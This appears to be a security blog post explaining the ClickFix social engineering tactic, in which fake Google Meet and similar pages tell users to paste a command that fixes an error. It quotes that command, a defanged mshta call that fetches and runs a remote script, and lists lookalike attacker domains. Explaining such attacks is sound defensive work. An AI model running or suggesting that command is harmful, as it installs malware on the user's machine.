In recent months, multiple malware distribution campaigns have been using ClickFix to spread Windows and macOS malware. This is in an attempt to bypass browsers, anti viruses, and other security features.<\/p>\n\n\n\n
Bellow is a timeline of the proliferation of the ClickFix social engineering tactic over time:<\/p>\n\n\n\n As you can see, this tactic was first discovered in March and as become more and more sophisticated to the point where they are impersonating Google Chrome, Facebook, PDFSimpli, reCAPTCHA, and more recently Google Meets.<\/p>\n\n\n\n The targets of these attacks are usually people who need to click links for work, especially meeting links. According to Sekoia[2], transport and logistics companies in North America have been targeted by this tactic from at least May to August 2024 by using websites that impersonate transport and fleet operations management software.<\/p>\n\n\n\n The most recent victim of this was Google Meet. These bad actors create domains that look like official Google Meet domains and then once the user is on the page, they are prompted with an error. The solution always being to copy a command onto your clipboard and then paste and run it in the command line<\/p>\n\n\n\n Sekoia were able to identify the following domain names and IP address: Note how they look like real google links except for the symbols. Most people will not even look twice before clicking these links.<\/p>\n\n\n\n What does the Command Do?<\/p>\n\n\n\n mshta hxxps:\/\/googIedrivers[.]com\/fix-error<\/em><\/p>\n<\/blockquote>\n\n\n\n The command basically runs the fix-error file hosted on their domain. The file contains a VB script that does the following:<\/p>\n\n\n\n According to Sekoia the threat actors are members of the traffers team \u201cSlavic Nation Empire (SNE)\u201c, which is a sub-team of the cryptocurrency scam team \u201cMarko Polo<\/em>\u201c.<\/p>\n\n\n\n These types of social engineering tactics are becoming more common, and the worst part about them is that the user does all the work. There is no security system that can educate users on what not todo. The more convincing the social engineering the harder it is to combat.<\/p>\n\n\n\n References 2. https:\/\/blog.sekoia.io\/clickfix-tactic-the-phantom-meet\/<\/a><\/p>\n\n\n\n![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-1024x640.png\")
![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix-1024x750.png\")
![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-1024x761.png\")
meet[.]google[.]us-join[.]com<\/em>
meet[.]googie[.]com-join[.]us<\/em>
meet[.]google[.]com-join[.]us<\/em>
meet[.]google[.]web-join[.]com<\/em>
meet[.]google[.]webjoining[.]com<\/em>
meet[.]google[.]cdm-join[.]us<\/em>
meet[.]google[.]us07host[.]com<\/em>
googiedrivers[.]com<\/em>
hxxps:\/\/meet[.]google[.]com-join[.]us\/wmq-qcdn-orj<\/em>
hxxps:\/\/meet[.]google[.]us-join[.]com\/ywk-batf-sfh<\/em>
hxxps:\/\/meet[.]google[.]us07host[.]com\/coc-btru-ays<\/em>
hxxps:\/\/meet[.]google[.]webjoining[.]com\/exw-jfaj-hpa<\/em><\/p>\n\n\n\n\n
\n
![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-741x1024.png\"){kind=spacer}
1. https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/clipboard-compromise-powershell-self-pwn<\/a><\/p>\n\n\n\n